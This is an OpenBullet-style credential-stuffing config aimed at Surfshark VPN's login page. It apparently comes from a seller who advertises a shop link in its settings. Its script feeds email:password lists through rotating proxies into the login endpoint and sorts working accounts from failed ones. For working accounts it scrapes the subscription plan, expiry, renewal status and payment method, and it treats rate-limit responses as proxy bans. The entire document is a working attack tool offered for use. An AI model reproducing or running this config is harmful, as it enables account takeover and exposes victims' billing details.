[SETTINGS]
{
  "Name": "Surfshark VPN Web API",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-08-01T03:40:12.1245694-04:00",
  "AdditionalInfo": "https://sellix.io/NavX :) Nav#2598",
  "Author": "Nav",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GUID FUNCTION RandomString "?d?d?d?l?d?d?d?d-?l?d?d?l-?d?d?d?d-?l?l?d?d-?l?d?l?l?l?d?d?d?l?d?d?d" -> VAR "GUID" 

#GET REQUEST GET "https://my.surfshark.com/auth/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#POST REQUEST POST "https://my.surfshark.com/auth/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 52" 
  HEADER "content-type: application/json" 
  HEADER "cookie: surfshark-uuid=<GUID>; surfshark-locale=en; _ga=GA1.2.147242500.1627798982; _gid=GA1.2.2134119797.1627798982; _gat_surfsharkTracker=1; _gcl_au=1.1.1547763245.1627798982; surfshark-coupon=sharkstart; surfshark-currency=USD; _hjid=e9d59d04-b453-4eb5-8877-18caf7385b2e; _hjFirstSeen=1; _hjAbsoluteSessionInProgress=0; __cflb=02DiuEJCGiiFg9VyaarsAuYKuHcbKve5mv5L5MxQ4VTat; _uetsid=eca37510f29011ebb0268ba19afaad58; _uetvid=d76365e0cea811ebbe934d5f868ca4d0; _hjIncludedInSessionSample=1" 
  HEADER "origin: https://my.surfshark.com" 
  HEADER "referer: https://my.surfshark.com/auth/login" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"92\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"92\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{}" 
  KEYCHAIN Failure OR 
    KEY "{\"error\":{}}" 

#GET2 REQUEST GET "https://my.surfshark.com/account/subscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Status PARSE "<SOURCE>" LR ",\"displayFrequency\":0,\"status\":\"" "\",\"renewable\":" CreateEmpty=FALSE -> CAP "Status" 

#Plan PARSE "<SOURCE>" LR "\">Current plan</div><div class=\"_26KDo\"><div class=\"_1OgXg\"><div class=\"_1GF1F\">" "</div><div class=\"_3Gk6S" CreateEmpty=FALSE -> CAP "Plan" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "status\":\"expired\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Status>" Contains "canceled" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Plan>" Contains "No active subscription" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 

#Expires PARSE "<SOURCE>" LR "\"><div data-test=\"label-subscription-expiry\">renews on " "</div></div><" CreateEmpty=FALSE -> CAP "Expires" 

#Auto_Renew PARSE "<SOURCE>" LR "\",\"renewable\":" ",\"promotable\":" CreateEmpty=FALSE -> CAP "Auto Renew" 

#Payment_Method PARSE "<SOURCE>" LR "Active payment method</div><div class=\"_3Gk6S\">" "</div><div class=\"_" CreateEmpty=FALSE -> CAP "Payment Method" 

#Credits FUNCTION Constant "Nav" -> CAP "Config by" 

